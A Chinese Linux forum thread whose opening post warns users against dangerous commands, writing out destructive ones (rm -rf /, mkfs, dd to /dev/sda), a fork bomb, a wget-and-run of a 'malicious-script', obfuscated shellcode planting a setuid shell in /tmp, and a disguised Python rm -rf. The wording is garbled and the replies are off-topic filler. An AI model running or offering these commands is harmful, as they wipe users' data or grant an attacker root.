仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 447|回复: 7
打印 上一主题 下一主题

[CentOS(社区)] 带来一篇老手注重:万万不要运转的Linux下令

[复制链接]
老尸 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-14 21:18:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的好朋友们!文中列出的下令相对不成以运转,即便你以为很猎奇也不可,除非你是在假造机上运转(呈现成绩你能够复原),由于它们会实其实在的损坏你的体系。以是不在root等初级办理权限下实行下令是很好的习气。

日夕有一天,Linux体系会像Windows那样盛行,用的人愈来愈多,包含对盘算机不是很懂得的人,本文的目标就是告知人人:在Linux给你最年夜水平自在度的同时,也使得损坏体系变得加倍简单,假如你不懂得某些下令的意义,下载实行包括歹意下令的剧本,大概上圈套运转某些下令,很简单让你哭都来不及。

这并非申明Linux不宁静,只是申明在不懂得Linux,和很不当心的人眼前,Linux非常不宁静。Windows也好,Linux也好,人自己才是最年夜的不宁静要素。

上面的下令会删除你硬盘上的文件,rm的-r递回删除,和-f强迫删除是很伤害的选项,即便一样平常操纵,也会碰到误删文件的情形。

sudorm-rf/删除根分区全体的文件
sudorm-rf.删除以后目次下的一切文件
sudorm-rf*同上
rm-rf*orrm-rf*.*同上
rm-rf~/&删除根分区和家目次,即便你不是root,家目次仍是不克不及幸免。

一样,假如你不晓得mkfs.xxxx(xxxx能够是vfat、ext2、ext3、bfs……)是格局化下令的话,运转上面的下令会擦除你的硬盘分区:

sudomkfs.xxxx

dd是壮大的IO输出输入定向工具,假如利用不妥,损坏性很年夜,不单单是以后分区,以后体系,有的时分是全部硬盘。

sudoddif=/dev/zeroof=/dev/sda全体硬盘清零。
sudoddif=/dev/sdaof=/dev/sdb用第一块硬盘的内容掩盖第二块的内容。
sudoddif=somethingof=/dev/sda往硬盘上写渣滓数据。

同理,间接把下令了局定向到硬盘上,相称于往硬盘上写渣滓数据:

any_command>/dev/sda用随便的数据损坏硬盘

下面的sda、sdb也多是其他相似的称号。Linux的/dev体系给利用硬件供应了很便利和壮大的功效,同时也使得损坏变得更简单。

fork下令翻开一个子历程,假如把fork放在无穷轮回中,终极子历程会耗尽一切内存资本

:(){:|:&};:

这段不知所云的标记,可让Shell一直的fork子历程,最初招致内存耗尽,不能不重启,这不是bug,只是Shell语句存心写成简写的情势罢了。上面的同理:

forkwhilefork

有的时分,紧缩包也是一个损坏来历~

有的紧缩包请求你解压到某个体系中已存在的目次中,这时候候你就要出格当心了,紧缩包内里大概有不计其数的小文件,以各类文件名实验掩盖你现有的文件。

有的紧缩包看起来很小,可是解压出来是上GB的渣滓数据,会充溢你的硬盘。

从不正轨网站下载的步伐、剧本,一样会有包括歹意下令的伤害,不成任意实行:

wgethttp://some_place/some_file
sh./some_file
wgethttp://hax018r.org/malicious-script
sh./malicious-script

载剧本要确保来历正轨,假如有才能,能够浏览其代码。

即便有源代码的步伐,也不要任意编译实行:

charesp[]__attribute__((section(".text")))/*e.s.p
release*/
="xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp-p/bin/sh/tmp/.beyond;chmod4755
/tmp/.beyond;";

下面看起来只是一堆没成心义的16进制数据,假如有人告知你,运转这个步伐你就能够不输出暗码获得体系的root权限,你可不要信任他,下面的步伐实践运转的是“rm-rf~/&”。

python一类的剧本言语,一样能够拿来弄损坏:

python-cimportos;os.system("".join([chr(ord(i)-1)foriin"sn!.sg!"]))

这段步伐实践上会实行rm-rf*,大概你很奇异下面步伐开头的“sn!.sg!”是甚么意义,实践上就是rm-rf*每一个字母的下一个!

那末我们怎样制止运转歹意步伐呢?
第一不要用root作为一样平常利用的用户,下面的步伐,假如以后用户不是root,伤害的涉及局限就会小良多。
第二要晓得哪些下令是干甚么用的,不晓得的下令不要贸然运转。运转有潜伏损坏才能的步伐,要当心反省本人的输出。
第三要包管软件、剧本的来历正轨。
最初一点,固然对照悲观,可是的确非常主要的一点:
常常备份你的数据!!如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的好朋友们!
小女巫 该用户已被删除
沙发
发表于 2015-1-17 10:38:27 | 只看该作者
另外Linux上也有很多的应用软件,安装运行了这些软件后,你就可以在Linux上编辑文档、图?片,玩游戏、上网、播放多媒体文件等。
精灵巫婆 该用户已被删除
板凳
发表于 2015-2-2 21:15:49 | 只看该作者
即便是非英语国家的人发布技术文档,Linux也都首先翻译成英语在国际学术杂志和网络上发表。
爱飞 该用户已被删除
地板
发表于 2015-2-8 07:28:40 | 只看该作者
Windows有MS-DOS?方式,在该方式下通过输入DOS命令来操作电脑;Linux与Windows类似,也有命令方式,Linux?启动后如果不执行?X-WINDOWS,就会处于命令方式下,必须发命令才能操作电脑。?
再见西城 该用户已被删除
5#
发表于 2015-2-25 04:31:17 | 只看该作者
下面笔者在论坛看到的一个好问题: “安装红旗4.0后,系统紫光输入法自带的双拼方案和我的习惯不一样,如何自定义双拼方案解决?谢谢?”这个问题很简练。
金色的骷髅 该用户已被删除
6#
发表于 2015-3-7 19:34:59 | 只看该作者
如果上面的措施没有解决问题,此时你就需要Linux社区的帮助了。 Linux的使用者一般都是专业人士,他们有着很好的电脑背景且愿意协助他人。
乐观 该用户已被删除
7#
发表于 2015-3-15 16:25:35 | 只看该作者
笔者五分钟后就给出了解决方法: “首先备份原文件到其他目录,然后删掉/usr/local/unispim/unispimsp.ksc,编辑 /usr/local/unispim/unispimsp.ini,最后重启动计算机
变相怪杰 该用户已被删除
8#
发表于 2015-3-22 03:25:37 | 只看该作者
下面看看一个让人无法回答的问题:“救命各位高手,向你们请教一些问题:如何在Linux下配制HTTP、FTP、Samba、DNS、DHCP、Sendmail服务器,谢谢”这样的问题。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-11-16 13:40

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表